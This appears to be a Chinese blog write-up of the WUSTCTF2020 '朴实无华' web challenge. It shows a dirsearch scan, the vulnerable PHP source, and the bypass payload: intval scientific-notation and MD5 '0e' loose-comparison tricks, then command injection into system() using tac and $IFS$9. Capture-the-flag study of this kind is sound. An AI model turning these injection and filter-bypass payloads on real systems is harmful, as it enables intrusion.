[WUSTCTF2020]朴实无华 1

[WUSTCTF2020]朴实无华 1

进入环境,什么也没有得到,估计就是需要我们进行目录扫描了

dirsearch进行把爆破扫描

环境的问题,很多的环境在进行扫描的时候,如果访问过快,就会返回429 ,建议将线程数调小,否则会出现文件 429请况,影响结果

dirsearch.py -e bak,zip,tgz,txt -u https://target -t 30

[WUSTCTF2020]朴实无华 1_第1张图片
[WUSTCTF2020]朴实无华 1_第2张图片
我们尝试访问文件
[WUSTCTF2020]朴实无华 1_第3张图片
访问 fAke_f1agggg.php
[WUSTCTF2020]朴实无华 1_第4张图片
使用 bp抓包 查看情况
[WUSTCTF2020]朴实无华 1_第5张图片
发现了新的文件,尝试访问
发现了朱一旦(不是)
发现php源码
[WUSTCTF2020]朴实无华 1_第6张图片
不过是乱序,我们改变编码方式

(火狐) 点击 alt 在查看中修改文件编码
[WUSTCTF2020]朴实无华 1_第7张图片


header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.
"
; }else{ die("金钱解决不了穷人的本质问题"); } }else{ die("去非洲吧"); } //level 2 if (isset($_GET['md5'])){ $md5=$_GET['md5']; if ($md5==md5($md5)) echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.
"
; else die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲"); }else{ die("去非洲吧"); } //get flag if (isset($_GET['get_flag'])){ $get_flag = $_GET['get_flag']; if(!strstr($get_flag," ")){ $get_flag = str_ireplace("cat", "wctf2020", $get_flag); echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.
"
; system($get_flag); }else{ die("快到非洲了"); } }else{ die("去非洲吧"); } ?>

代码审计
要进行三次绕过

intval() 函数用于获取变量的整数值。(强制转换)

第一个,要让 num<2020 num+1>2021
这里要用到 intval
如果intval函数参数填入科学计数法的字符串,会以e前面的数字作为返回值而对于科学计数法+数字则会返回字符串类型(只适用php7.0以下的版本)
所以我们可以构造:2e5
第二个,要求 本身和其MD5值相同
md5=0e215962017
第三个,我们进行绕过

?mun=2e5&md5=0e215962017&get_flag=ls

str_ireplace(find,replace,string,count)
str_ireplace() 函数替换字符串中的一些字符

参数 描述
find 必需。规定要查找的值。
replace 必需。规定替换 find 中的值的值。
string 必需。规定被搜索的字符串。
count 可选。一个变量,对替换数进行计数。

str_ireplace(“cat”, “wctf2020”, $ get_flag);
这里的cat被过滤掉了
strstr($ get_flag," "):用于判断字符串空格是否是$ get_flag的子串(过滤空格)

构造payload

/fl4g.php?num=2e4&md5=0e215962017&get_flag=tac$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

[WUSTCTF2020]朴实无华 1_第8张图片

你可能感兴趣的:(buuctf,web安全,php)